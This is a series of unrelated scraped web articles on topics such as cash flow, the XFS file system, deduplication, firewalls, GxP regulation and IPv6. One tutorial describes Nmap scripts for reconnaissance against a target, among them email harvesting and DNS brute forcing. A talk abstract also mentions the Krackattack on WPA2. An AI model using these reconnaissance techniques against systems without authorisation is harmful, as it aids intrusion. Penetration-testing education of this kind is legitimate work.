The traditional energy companies are facing competition from every corner, from margins to competition and price fluctuations. Digital transformation is a crucial ingredient in the energy transition, allowing the integration of more and more renewable energies throughout the electrical system, increasing network reliability, and helping to better manage energy demand. | <urn:uuid:09936de4-2171-4819-9d35-1cd63cd027c9> | CC-MAIN-2022-40 | https://www.ciocoverage.com/digital-transformation-in-energy-sector/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.927571 | 1,309 | 2.9375 | 3 |
Finance and Accounting
Cash flow optimisation techniques
Cash flow is essential for every business to meet its short-term goals. However, during the pandemic, 65% of small businesses struggled or failed to pay their operational expenses.Without sufficient liquidity, businesses could be profitable on paper yet go bankrupt. This raises a few important questions:
- How to have a structured approach to manage cash flow?
- How much cash reserve should a company have at any given time?
- How to optimise cash flow to prepare for crises?
Cash flow analysis and its importance
Cash flow gives you a picture of how your business earns and spends the money. It is different from profit, which is merely the income minus the expenses. Cash flow analysis tells you about:
- Your biggest customers
- Your largest expenses
- The amount of liquid cash you have to meet for any short-term expenses
Cash flow analysis helps you meet financial obligations while investing enough for your business growth.
Seven elements of managing cash flow
Small business cash flow management is a structured approach, and traditional methods of accounting, invoicing, and billing don’t make the cut. You need to optimise and thoroughly monitor the following elements for innovative methods.
By giving excess leeway to their clients, companies reduce profitability even though they may have lots of business. Optimise receivables by:
- Aligning sales with finance: Define payment terms for both the customers and the company and align them with the customers’ master data.
- Having an efficient billing process: Automate the billing process, which includes approvals, error correction, and timely bill dispatch. Ensure that someone is in charge of the process.
- Defining a payment collection strategy: Have a mechanism to know which payments are meeting the deadlines and will soon be overdue. Have a formal reminder and escalation process.
Payments depend on your supplier’s terms. Here is how you can optimise them.
- Negotiate the payment terms upfront: We often negotiate the prices but not the payment terms. It is best to discuss and mention them in the contract.
- Get visibility on procurement data: You need a system to match all purchase orders with respective invoices. With a graphical view of the procurement data, this helps identify problems quickly.
- Optimise the timing of the payment: Pay on time but don’t rule out advance payments. If you have surplus cash, early payments can get you discounts in the future.
Companies that manage inventory not only have to invest in a physical space but also the stock. You can do that efficiently with:
- Stock minimal inventory: Businesses do not want to overstock or understock their warehouse. With technology that predicts demand, you can manage the supply and ensure sufficient cash liquidity.
- Monitor the demand: Monitor how the demand changes every week or month or during festive seasons. If you have a bird’s eye view of this data, you can choose your suppliers wisely.
- Get a real-time view: The right systems give you a real-time view of the stock and its location across your warehouses.
Cash flow forecasting mechanism
Have a forecasting and review exercise once in 12–18 months. The direct method uses a cash-based forecast (rather than accrual) for short-term planning. The indirect method uses income statements from balance sheet day sales and payables outstanding and inventory for long-term planning.
Cash flow statement
It indicates a company’s financial health and comprises cash from operating activities, investing activities, financing activities, the net change in cash, and net cash.
Outputs should provide key areas for action to maintain operating cash by investing it strategically.
During business as usual, you could review cash flows once a month. But during crises, you need to perform the exercise weekly. Compare the forecast with the actual statement to identify variance and improve accuracy.
For organisations on the digital transformation journey, agility is key in responding to a rapidly changing technology and business landscape. Now more than ever, it is crucial to deliver and exceed organisational expectations with a robust digital mindset backed by innovation. Enabling businesses to sense, learn, respond, and evolve like living organisms will be imperative for business excellence. A comprehensive yet modular suite of services is doing precisely that. Equipping organisations with intuitive decision-making automatically at scale, actionable insights based on real-time solutions, anytime/anywhere experience, and in-depth data visibility across functions leading to hyper-productivity, Live Enterprise is building connected organisations that are innovating collaboratively for the future.
How can Infosys BPM help?
The order-to-cash (O2C) solution uses technologies such as AI, ML, RPA, and AR to improve your financial cash flow efficiency. You get superior experience and reduce any frauds and customer defaults, with solutions such as:
- Quote and order processing
- Billing, invoicing, and collections
- Dispute management
- Revenue leakage analysis
- Cash flow analytics
View the complete O2C solutions by Infosys BPM. | <urn:uuid:fe54e28d-b984-4917-849a-1f7975e65855> | CC-MAIN-2022-40 | https://www.infosysbpm.com/blogs/finance-accounting/cash-flow-optimization-techniques.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00719.warc.gz | en | 0.923027 | 1,075 | 2.546875 | 3 |
In 1994, Silicon Graphics Inc., of Mountain View, Calif., (SGI) released a new journaled file system on IRIX, the company’s System V-based version of UNIX. This advanced file system, called XFS, replaced SGI’s old EFS (Extent File System) file system, which was designed similar to the Berkeley Fast File System. Coordinating with many other kernel developers, SGI is currently working to tightly integrate the XFS file system with the Linux operating system so that we can take advantage of the many benefits of XFS over the current ext2 file system. This article discusses XFS and its technical specifications.
Origin of XFS
SGI designed XFS with a few very important features in mind, and for very specific reasons. In 1990, SGI realized that it would need to create something to replace EFS; EFS could not handle the demands of new and forthcoming applications. The issues facing any file system at that time were demands for increased disk capacity and bandwidth, and parallelism with new applications such as film, video, and large databases. Because EFS couldn’t hope to handle these needs efficiently, SGI created XFS for the purpose of handling new applications by providing support in a few key areas. These areas included fast crash recovery, large file systems, and large directories and files.
In 1999, SGI began to turn an eye to Linux as a viable and attractive operating platform to support. Due to the nature of Linux, and because SGI knew it had something to offer that would provide Linux with the same file-system capabilities as those found in IRIX, SGI released Open XFS to the Linux community.
Overview of XFS features
XFS provides some basic and powerful features that meet the requirements for any large file system, file, or directory. Let’s take a look at some of these features:
XFS uses B+ trees extensively in place of the traditional linear file system structure. B+ trees use a highly efficient indexing method to index directory entries, manage file extents, locate free space, and keep track of the locations of file index information. As a result, reading file systems and retrieving information from them happens quickly–without using large amounts of system resources.
Currently, the XFS team is developing enhancements to the Linux page cache so XFS can be tightly integrated with the Linux kernel. This work is being done so XFS relies solely on the page cache to store both file data and file system metadata. This work can also be used to enhance other file systems to improve overall system performance, because it is being developed at a kernel level. These features will most likely be unavailable until Linux 2.5, except as a part of XFS itself.
XFS also dynamically allocates disk blocks to inodes. If an application uses a small number of files that are very large, very little disk data is used to store the actual files–and the remainder of the disk is freed for more data. If an application uses many small files, more disk space is made available for directories and files. This process is handled dynamically, with no need for user intervention or configuration; you can create your initial file system without specifying block sizes according to what type of application will be using it. For example, you no longer need to create a file system with a smaller block size for efficient use by a mail server. XFS handles all of this internally with an advanced space management technique that utilizes contiguity, parallelism, and fast logging.
Many powerful support utilities come with XFS and enhance it remarkably. It includes the following:
- A very fast mkfs utility to make the file system
- Advanced dump and restore utilities for backups
- xfs_db for debugging
- xfs_check for checking the file system
- xfs_repair for file system repairs
- xfs_fsr for defragmenting XFS file systems
- xfs_bmap, which can be used to interpret the metadata layouts for the file system
- grow_fs, which will enlarge XFS file systems online
XFS also provides file system journaling. This means that XFS uses database recovery techniques to recover a consistent file system state after a system crash. Using journaling, XFS is able to accomplish this recovery in under a second, regardless of the file system size. Traditional linear file systems without journaling, however, must run the fsck command over the entire file system to check it after a system crash; this process is rapid on smaller file systems, but can take a lot of time (in some cases measured in hours) on larger file systems. XFS is able to accomplish this fast recovery by logging all file transactions with information on free lists, inodes, directories, and so on. After a crash, the logs are analyzed, and XFS can quickly determine which transactions must be done in order to synchronize the file system to the state it was in prior to the crash.
|XFS Technical Specifications
The following list summarizes most of the features that XFS provides. Because the Linux implementation of XFS is still in the development stages, the features listed may or may not be applicable to the Open XFS for Linux specification. These features are available to XFS for IRIX, and they give a reasonable idea of what we can expect from a Linux implementation of XFS:
File system scalability is the ability of the file system to provide support for very large file systems, large files, large directories, and large numbers of files while still providing good I/O performance. The scalability of a file system depends somewhat on how it stores information on files.
To illustrate this point, let us compare XFS (a 64-bit file system) to any other 32-bit file system. Because XFS uses 64 bits to store inode numbers and addresses for each disk block, a single file can theoretically be as large as 9 million terabytes. A 32-bit file system, however, cannot usefully exceed file sizes of 4GB. I don’t honestly know anyone who needs a file to be 9 million TB (or even 4GB!), but by providing such a high level of scalability, XFS ensures that it will not become an obsolete or unusable file system for many years to come. For individuals in high-level science applications (for example, NASA), or those in the video or audio industries where file sizes can reach ridiculous sizes, XFS is necessary to make their work easier and plausible.
Large directories are also an issue with traditional linear file systems. Applications such as Sendmail or news servers often result in spool directories with thousands of files. Looking up a filename in such a directory can take a long time, because typically the directory must be read from the beginning until the desired file is found. Because XFS uses a B+ tree structure, it makes directory searching extremely fast. Filenames in the directory are converted to a four-byte hash value and are used to index the B+ tree. Using this method, all directory functions (searching, creating, and removing) are very efficient and fast.
Using the same idea, XFS supports large numbers of files efficiently because inodes are allocated dynamically and multiple file operations are performed in parallel. The only limitation for XFS in regards to the number of files in a file system is the space available to hold them. Because XFS dynamically allocates inodes, free space usage is extremely efficient, regardless of the file size. With traditional file systems–in which the number of inodes is specified during file system creation–you are limited by that initial number of inodes. You can increase or decrease the inode size and number during the file-system creation, but then you end up locking the system into a specific state of usability. If you use a large number of inodes up front, you consume a lot of disk space that may never be used. But if you use a smaller number of inodes, any small files stored on the file system will use the full inode block size and waste space that could have been saved by using a smaller inode size (which results in more inodes).
Why choose XFS?
As we’ve seen, XFS is a flexible, powerful, and fast file system. Current development of file systems for Linux include a number of forthcoming journaling file systems. Available right now is the ReiserFS journaling file system, and coming soon is ext3, which is a backward-compatible journaling file system based on ext2. IBM also released an initial release of its Enterprise JFS, another journaled file system written initially for AIX.
So, in light of these forthcoming alternatives, why should you be concerned with XFS? If ReiserFS is currently available and these others are coming out, why should you choose XFS over any of them?
The main factor is maturity. ReiserFS and ext3 are still in-development immature file systems. XFS is mature–it’s been running on IRIX machines since 1994. SGI developed it six years ago to be a robust, long-standing, viable alternative to linear file systems. In short, SGI knows how to make a good file system.
Yes, we may have to wait another few months before XFS is a realistic alternative to ReiserFS, which is currently available; but I think the wait will be worth it. I’ve illustrated the many benefits of XFS over traditional file systems. Because it has commercial backing and–perhaps more important–because commercial dollars are invested in the project, XFS for Linux will quickly attain the same level of reliability it has had on IRIX for years. To get more information on XFS or to contribute to the project, visit the project Web site at http://oss.sgi.com/projects/xfs/. | <urn:uuid:40476a3f-5c10-47db-b78a-b982e1f7dbb3> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/os/xfs-its-worth-the-wait/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00719.warc.gz | en | 0.940905 | 2,049 | 3.09375 | 3 |
Quantum Microscope Illuminates Living Samples Safely Versus Conventional Microscopes Using Damaging High-Intensity Light
(CosmosMagazine) University of Queensland researchers have built a quantum microscope based on the strange phenomenon Albert Einstein once called “spooky action at a distance”.
This new device takes advantage of quantum entanglement to illuminate living samples safely – unlike conventional microscopes, which use potentially damaging high-intensity light.
Warwick Bowen, a quantum physicist at the University of Queensland, says this is the first entanglement-based sensor that supersedes non-quantum technology.
“This is exciting – it’s the first proof of the paradigm-changing potential of entanglement for sensing,” says Bowen, who is lead author on the new paper published in Nature.
“The best light microscopes use bright lasers that are billions of times brighter than the sun,” Bowen explains. “Fragile biological systems like a human cell can only survive a short time in them.
“We’re hitting the limits of what you can do just by increasing the intensity of your light.”
Bowen and team’s new microscope may just kickstart the next revolution in microscopy, because they’ve evaded these limitations by introducing quantum entanglement. | <urn:uuid:15a82964-cda9-43e7-bf76-b39fd0d08cf4> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-microscope-illuminates-living-samples-safely-versus-conventional-microscopes-using-damaging-high-intensity-light/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00719.warc.gz | en | 0.861343 | 279 | 3.28125 | 3 |
There are two ways in which target de-dupes can be performed, and they are either as post process de-duplication or inline de-duplication.
The de-duplication that occurs between the source and the destination or target is what is what is termed Inline de-duplication. On the other hand, Post process de-duplication is best defined as the situation whereby data is de-duplicated at programmed time frames when it has already been transmitted by the source, but prior to it getting to the storage device. The channelling of the data can either be through hardware or software based on the case involved. Both the hardware and the software remain in sync with the storage disk. There is also the evaluation of data against the ones already in the storage disk for easy identification and removal of duplicated data, irrespective of the target de-duplication being used.
The enterprise that has proprietary software installed in their system will benefit enormously from the post process de-duplication. But, there is not always a need for modification or redesigning of the source software at the organisation end in order to meet the needs of de-duplication hardware or software. There is no need to be concerned about compatibility issues, as the source system can easily push the data into transmission. There is no need for installation of de-duplication hardware or software at every terminal node in order to permit transmission of data. With the central location of the de-duplication software or hardware, data from all the nodes are automatically channelled via the de-dupe device located on the network.
Lastly, for more effective use of enterprise computing system, the CPU powers can be released when de-duplication load are removed from the client central process unit (CPU). This is where the post-process de-duplication is better than the pre process de-duplication. There is no doubt about the fact that the target de-dupe is quicker when compared with source de-duplication. The data is said to be pushed into the network, making the de-dupe process to operate at the storage end so as to match data quicker and remove duplicates with ease.
With lots of advantages of source process de-duplication, it is not without its flaws. The post process de-duplication is known to be bandwidth intensive. For that reason, if there is an exponential increase in the amount of data in an enterprise, the target de-duplication will not be the best option. Before scheduled post process de-duplication is started, although it might involve additional expenses, large arrays of storage disk will need to be used to create space for storage of transmitted data. This additional cost is among the flaws associated with post process de-duplication.
The need to redesign the proprietary software to accommodate demands of the de-duplication devices and process, installation of de-duplication hardware at all the connecting nodes, and others will contribute to be more cost effective than the use of technologies that are based on target de-duplication. If the cloud service provider partnering with the enterprise determines charges fees based on the bandwidth usage, source de-duplication may further be attractive.
Therefore, companies must determine the particular kind of de-duplication process that will work best for them. Some of the things enterprises need to consider before selecting any of the de-duplication process include: Volume of data, availability of bandwidth, cost of bandwidth, and lots of other important factors. In fact, the exercise involved in determining the best fit for an enterprise is not an easy one. | <urn:uuid:611a33ed-07d8-46c5-8d8b-a6923b716646> | CC-MAIN-2022-40 | https://blog.backup-technology.com/category/other/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.928742 | 755 | 2.53125 | 3 |
We all know and love it and would like to have it available all over the world - Wireless LAN. A technology that is used in many places to provide free Internet access, enable networking for various components or to move freely in offices and at home. But how secure is the wireless network that connects so many devices?
This talk will explore this question and try to give a brief overview of the functionality of the encryption standards WPA2 and WPA3 and explain known attacks on these two standards. The talk will also demonstrate the use of the well-known Krackattack. | <urn:uuid:170b36be-4bfe-422c-893a-5efdde436546> | CC-MAIN-2022-40 | https://cfp.bsidesvienna.at/bsv19/speaker/MRDQQE/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.95115 | 126 | 2.578125 | 3 |
Nmap is tool that can perform various activities in a penetration test.The function of NSE (Nmap Scripting Engine) and the scripts that have written so far they can transform Nmap to a multi purpose tool.For example we can use Nmap during the information gathering stage of a penetration test just by using the appropriate scripts.In this article we will examine those scripts and the information that we can extract.
One of our first steps it can be to determine the origin of the IP address that our client has given to us.Nmap includes in his database a couple of scripts for this purpose.If we want to run all these scripts we can use the following command as it can be seen in the image below:
As we can see the script called an external website (geobytes) in order to determine the coordinates and location of our target.
The command Whois can be run directly through the console in Linux environments.However there is a specific script for Nmap that performs the same job and it can be used.This script will return information about the registrar and contact names.
Email accounts can prove also important in a penetration test as it can be used as usernames,in social engineering engagements (i.e Phishing Attacks)or in a situation where we have to conduct brute force attacks against the mail server of the company.There are two scripts available for this job:
The http-google-email script uses the Google Web and Google Groups in order to search for emails about the target host while the http-email-harvest spiders the web server and extracts any email addresses that it discovers.The http-email-harvest is in the official repository of Nmap and the http-google-email script can be downloaded from here.
Brute Force DNS Records
DNS records contains a lot of information about a particular domain which cannot be ignored.Of course there are specific tools for brute forcing DNS records which can produce better results but the dns-brute script can perform also this job in case that we want to extract DNS information during our Nmap scans.
Discovering Additional Hostnames
We can discover additional hostnames that are based on the same IP address with the nmap script http-reverse-ip.This script can help us to find other web applications that exist on the same web server.It is an external script that can be downloaded from here.
In this article we examined some Nmap scripts (internal and external) that can be used during the information gathering stage of a penetration test and before we start the actual scanning.The information that we have obtained proves that Nmap can perform almost any task with his scripts.If it cannot do something that you want then it is time to write your own Lua scripts and to contribute to the community. | <urn:uuid:adf5b3ce-e3a2-4fd2-b539-e5949ab4f020> | CC-MAIN-2022-40 | https://pentestlab.blog/tag/information-gathering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.918744 | 594 | 2.71875 | 3 |
Online form builders are among the best applications developed in this modern age. They help create contact forms, registration forms, or surveys, enabling you to gather the data you need without face-to-face interactions.
An essential element of form makers is form fields. This article will explain what they are and how they can benefit as you complete your own.
Form fields are the building blocks of online forms. They let you collect data from people who fill up your answer sheet.
Most form makers include different field types to put your title and objectives and ask various questions.
Here are some HTML form elements that you will likely encounter when you create your questionnaires or survey forms:
This form field type is added automatically to every online form. However, you should note that some description boxes are hidden by default.
Leave them blank if you're not keen on putting any title or description. You have to make sure that the main form block is filled in.
You can ask for small pieces of information here. It may be a name, an email address, or age. You have one line of text where respondents can answer the query. To guarantee that the answers are complete, you can input text, numbers, etc.
It employs validation techniques. Number validation can control a range of values, while text validation can see whether they input the proper email addresses or links.
Like the short answer field, this form field type asks for a text value but with a longer character limit. The data validations available here include length and regular expression. You can use them to receive detailed feedback or more extended notes in their answers.
Multiple choice lets you list down the possible answers to your questions. You can allow respondents to jump to another section based on their responses. You may also shuffle answer options to avoid partiality.
This field enables you to put a series of choices, and users can select more than one. You may require users to tick off a certain number of options. Some form makers may offer section jumps while others don't.
Do you want all of the answers in a dropdown menu? You can use this form field type. It's similar to multiple-choice, but it's in a dropdown list box. It keeps your online form clean and compact, especially when there are many choices.
This form field type allows respondents to choose a number within a set limit. The linear scale may range from 0 to 10, and you can put labels for the options, from lowest to highest.
This field type will be helpful if you're creating a form to let users reserve a time slot or if you're asking for their birthdate. Your respondents can use a dropdown box to choose a specific date or time.
The date format for the US version is set as Month/Date/Year, while UK versions may show Date/Month/Year. You can change it if necessary.
Simple contact forms do not need a lot of form fields, but longer surveys may look overloaded if it contains more than ten questions per page. Dividing them into sections can help break them into tiny pieces, so your respondents won't get overwhelmed.
Each section that you add may include its title and description. You can drag and drop elements to rearrange them.
Your respondents can skip some questions if these are not relevant to their previous answers. For example, you want to ask the respondent how many tickets he wants to buy. Now, he won't need to answer this if he's not attending the event.
The respondent can proceed to the following query with the conditional logic function without answering specific questions.
You can add optional questions or add a section jump. Ensure that the people who shouldn't see the questions are given alternate questions in another section. You may also send them to the end of the online form if there's nothing else to ask.
If you're looking for a form field example with outstanding creation capabilities, you may try FormBot. We provide a custom builder with an intuitive interface and a template library filled with ready-to-use forms.
We can help automate your workflow and enable you to focus on what matters most: engaging with your clients | <urn:uuid:5f1165c8-b5bf-45a0-a91e-278a1aee91b9> | CC-MAIN-2022-40 | https://www.formbot.com/form-builder/form-fields.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00719.warc.gz | en | 0.910531 | 849 | 2.546875 | 3 |
If you’re here, then you might be wondering what a firewall is. A firewall is a security device, computer software or hardware, that can help protect your whole network by filtering traffic and blocking any outsiders from gaining access to the private data on your computer or network. Not only do firewalls block unwanted traffic, but it can also help you block malicious software from infecting your devices. Firewalls can provide different types of protection. The key is figuring out how much protection it is that you need. For a helpful guide on firewalls and what they do, read on!
What Do Firewalls Do?
Firewalls act like gatekeepers. They monitor attempts to gain access to your operating system and block off unwanted traffic or unknown sources. How exactly does it do this? Firewalls act as a barrier or filter between your computer and another network, like the internet. You can think of a firewall kind of like a traffic controller. It helps protect your network and information by managing the network traffic. This includes blocking off any unsolicited incoming network traffic and validating access by assessing the network traffic for anything suspicious, like malware and hackers. Your operating systems and security software typically come with a pre-installed firewall too. It is a good idea to make sure that those features are all turned on. Also, check and see if your security settings are configured to run updates automatically.
How Do Firewalls Work?
To begin, a firewalled system analyzes network traffic based mostly on rules. A firewall only welcomes those incoming connections that it has already been configured to accept. It does this by allowing or blocking certain data packets – units of communication that you send over digital networks, all based on pre-established security rules. A firewall works like a guard at your computer’s entry point. Only trusted sources, or IP addresses, are granted access. IP addresses are important since they identify a source or a computer, just like how your postal address identifies where it is you live.
Kinds of Firewalls
There are hardware and software firewalls available. Each format serves a different but essential purpose. A hardware firewall is physical, much like a broadband router – stored right between your network and gateway. A software firewall is internal – as a program on your computer that works through different port numbers of applications. There are also some cloud-based firewalls, which are known as Firewall as a Service (FaaS). One benefit of these cloud-based firewalls is that they can grow with your organization and, much like hardware firewalls, do very well with perimeter security.
En-Net Services Can Help Today
Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements. | <urn:uuid:ece1ec5d-9421-46ca-9827-a2acd47f5423> | CC-MAIN-2022-40 | https://www.en-netservices.com/blog/a-guide-to-firewalls-why-you-might-need-one/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00119.warc.gz | en | 0.951908 | 629 | 3.640625 | 4 |
Understanding GxP Regulations for Healthcare
GxP is a collection of quality guidelines and regulations created to ensure that bio/pharmaceutical products are safe, meet their intended use, and adhere to quality processes during manufacturing, control, storage and distribution.
What is GxP?
GxP was established by the Food and Drug Administration (FDA) and encompasses different standards recognized as:
- G – stands for “Good”
- P – stands for “Practice”
- x – variable depending on the application. It can be M for “Manufacturing,” C for “Clinical,” L for “Laboratory,” S for “Storage,” D for “Distribution,” R for “Review,” etc.
GxP ensures that regulated organizations comply with specific and secure manufacturing and storage processes and procedures that determine effective research standards for nonclinical laboratory trials and safe human-subject clinical trials. GxP’s guidelines focus on:1
- Traceability: The ability to reconstruct the development history of a drug or medical device.
- Accountability: The ability to resolve who has contributed what to the development and when.
- Data Integrity (DI): The reliability of data generated by the system. DI could be determined by the following activities:
- Identifying the data generated by the system during critical processes (data flow diagram)
- Defining the DI requirements (e.g., ALCOA data attributes) during the lifecycle of data
- Identifying the risks and mitigation strategies (e.g., technical or procedural controls) to avoid DI breaches.
Who is impacted by GxP?
Regulated industries, including food, pharma, medical devices, and cosmetics, are impacted by GxP. GxP guidelines and regulations are global; some of the popular regulators include FDA in the US, TGA in Australia, and HS-SC in Canada. GxP includes varied regulation sets, but the most common are GCP, GLP and GMP:
GCP (Good Clinical Practice)
GCP is an international quality standard that is provided by the International Conference on Harmonisation (ICH), an international body that defines standards that governments can transpose into regulations for clinical trials involving human subjects. It controls experimentation on humans done for the sake of advancement in medical sciences and serves as a quality benchmark as well as a moderator that keeps such experimentation in check.
GLP (Good Laboratory Practice)
GLP is the nonclinical counterpart for GCP. These guidelines apply to nonclinical studies conducted for the assessment of the safety or efficacy of chemicals (including pharmaceuticals) to humans, animals and the environment.
GMP (Good Manufacturing Practice)
GMP consolidates the practices required to conform to the guidelines recommended by agencies that control authorization and licensing for the manufacture and sale of food, drug and active pharmaceutical products. These guidelines provide minimum requirements that a pharmaceutical or a food product manufacturer must meet to ensure that the products are of high quality and do not pose a risk to the consumer or public. Good manufacturing practices, along with good laboratory practices and good clinical practices are overseen by regulatory agencies in the United States, Canada, Europe, China and other countries. The most common GMP guidance documents are:
- EU Good Manufacturing Practice (GMP) Guidelines, Volume 4
- US FDA current Good Manufacturing Practice (cGMP) guidelines: 21 CFR Part 11, 210, 211 and 820
- WHO Good Manufacturing Practices for pharmaceutical products, Annex 4 to WHO Technical Report Series, No. 908, 2003
Monitoring simplified Using the ClearDATA dashboard for GxP
With healthcare transformation moving at a rapid pace, compliance and security monitoring across the healthcare enterprise is a major HIT challenge. ClearDATA Compliance and Security Dashboard simplifies adherence to administrative, physical and technical safeguards.
Our dashboard is mapped directly to HIPAA and FDA and GDPR guidelines. It can be enabled across different cloud environments and easily monitor thousands of components, providing unique individual asset scorecards as well as a wide variety of additional reports.
Sample Key scorecard metrics and features:
Validate that your storage medium is successfully encrypted to ensure compliance for FDA—21 CFR Part 11.30.
Login and log monitoring
Quickly identify and mitigate the risk of unauthorized system access to ensure compliance for FDA—21 CFR Part 11.10(g).
Securely retain six years of access logs with automated validation to ensure compliance for FDA—21 CFR Part 11.10 (e).
Patch level reporting
Receive notifications when new patches become available and quickly track previous updates to ensure compliance for FDA—21 CFR Part 820.30(i).
Partial GxP readiness checklist
Partner with a healthcare expert/managed service provider to address the following items:
- Define Quality System Regulation (QSR) gaps
- If applicable, discuss how to perform a Computer System Validation (CSV)
- Ensure that the following controls and procedures are implemented:
- Backup and recovery
- Contingency plan
- Disaster recovery
- Change control management
- Configuration management
- Error handling
- Maintenance and support
- Corrective measures
- System access
Prepare for your GxP Validation Process:
- Decide which GxP guidelines apply to you
- Decide how your technology maps to GxP guidelines
- Define user requirements
- What are your user needs?
- Functional specifications
- What will be automated?
- Solution analysis
- Validation of your system
- Build and construction
- System detailed design specifications
- System test procedures
- Quality review
- Data migration (legacy systems)
- Roles and responsibilities
- Pharmaceutical Computer Systems Validation: Quality Assurance, Risk Management and Regulatory Compliance, 2016
In the news
Facebook and Apple are at war, with the biggest battle still on the horizon
After years of aiming barbs at each other on privacy and security, the two companies are barreling toward a metaverse brawl with new augmented-reality headgear on the way Apple Inc. […]
How Patients Are Losing Control Of Their Data Amidst The Digital Healthcare Revolution
Without question, the Covid pandemic has forever altered how the healthcare system operates. In particular, we’ve seen the adoption of digital health accelerate at a breakneck pace, shining a light […] | <urn:uuid:22976ef2-6e4b-4b09-8bba-dd8faa9eeff3> | CC-MAIN-2022-40 | https://www.cleardata.com/platform-services/gxp-regulations/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00119.warc.gz | en | 0.894613 | 1,363 | 2.84375 | 3 |
IPv6 isn’t the new kid on the block, by any means. In fact, the “new” protocol has been ready for deployment since 1998 – but if the switch to v6 is as inevitable and urgent as we’ve been told, then why are we still using IPv4 technology nearly twenty years later?
The truth is this: Yes, we have been faced with the limitations of IPv4 addressing for many years, and yes, it is becoming increasingly urgent that we make the shift to IPv6 before we run out of v4 address spaces. In fact, the only reason this hasn’t already happened is thanks to technologies such as Network Address Translation (NAT) that allow several devices to share the same public IPv4 address. But with the growth of the Internet of Things (IoT), the globalised culture of the internet, and Bring Your Own Device (BYOD) office environments, the shift to IPv6 has taken on new urgency.
This article will take a look at some Network Architecture concerns in light of the imminent shift to IPv6.
This time, the shift to IPv6 is really happening
At this point, you’d be forgiven for thinking that the IPv4/IPv6 crisis is the contemporary equivalent of the Y2K bug scare: a looming date at which the internet will mysteriously cease working, all because we didn’t get our act together in time. This is, of course, not the case. But there are some very real concerns about moving to IPv6, not least of which is the dramatic increase in address usage with the implementation of IoT technology and the continued growth of the internet around the globe. According to this article on InternetSociety.org, Apple is shifting to an exclusively IPv6 Network Architecture with the upcoming release of iOS 9. The reason for the move is that more and more carriers around the world are switching to IPv6-only addressing – meaning that any applications that don’t work on IPv6 will simply not be able to function for those networks, and, as a result, those customers. It’s clear that many other major players in the field are coming to the same conclusion, as everyone from Google, to Facebook, to Cisco, to AT&T have already geared their networks for permanent IPv6 functionality.
How will Network Architecture be affected by IPv6?
The most obvious feature of IPv6 is its dramatically increased addressing space over IPv4. While IPv4 uses the decimal system, and is capable of addressing up to 4 billion devices (Without the help of address translating technology), IPv6 uses a hexadecimal system which results in a number of addresses so large, it defies human comprehension. But another departure from IPv4 methodology is that IPv6 addresses are dynamic – an IPv6 host can generate its own address, check its availability, and use it if it is available. This is due to the way IPv6 addresses are composed: The first 64 bits of the address specify the subnet prefix, while the last 64 bits specify the interface identifier – meaning that only the first 64 bits need to be unique only to the subnet to which the host connects. This has numerous Network Architecture implications, including the fact that address management will be automated – to a certain extent. For applications that use hard-coded IP addresses, this could present a monumental problem, and engineers should be aware of the fundamental incompatibility of hard-coded IPs within the IPv6 framework.
While many networks today use Dual Stack deployment models, the increase in demand on your network environment from using two separate addressing protocols, as well as the inherent limitations of IPv4, make this a counterproductive solution. IPv6 also includes built-in IPsec features, so overlaying security protocols on top of your IP is quite likely a thing of the past – IPsec is included as an optional header, so it is not hard-coded into the protocol, but incorporating security and encryption measures will be a far easier practice.
Being well-prepared is always the best defence
Although IPv6 has some radical implications for Network Architecture and app management, it’s important to return to the sentiment with which we started this article – IPv6 is, by no means, a brand-new technology. Its official launch was more than three years ago, and its inception happened nearly two decades in the past. With that in mind, sympathy can only be offered to a certain extent: we’ve all had ample warning that we’d be re-thinking our Network Architecture with the arrival of IPv6. For those who heeded the warnings in time, the transition to IPv6 could be a much smoother one, as changes to Network Architecture and capacity planning methods could easily have been made incrementally since the announcement of IPv6.
Shifting to IPv6 is no trivial matter, and the considerations to your Network Architecture will need to be thoroughly thought out. Partnering with a service provider that understands the importance of shifting to IPv6, and one that can provide you with the tools you need to make the transition as smooth as possible should be your first port of call. IRIS offers IP management tools that cater to both IPv4 and IPv6 frameworks, and have the expertise and experience to help you gear your network for the future. To find out more about what IRIS can offer you, please download a free trial of our software today.
[fusion_builder_container hundred_percent=”yes” overflow=”visible”][fusion_builder_row][fusion_builder_column type=”1_1″ background_position=”left top” background_color=”” border_size=”” border_color=”” border_style=”solid” spacing=”yes” background_image=”” background_repeat=”no-repeat” padding=”” margin_top=”0px” margin_bottom=”0px” class=”” id=”” animation_type=”” animation_speed=”0.3″ animation_direction=”left” hide_on_mobile=”no” center_content=”no” min_height=”none”][hs_action id=”2010″]
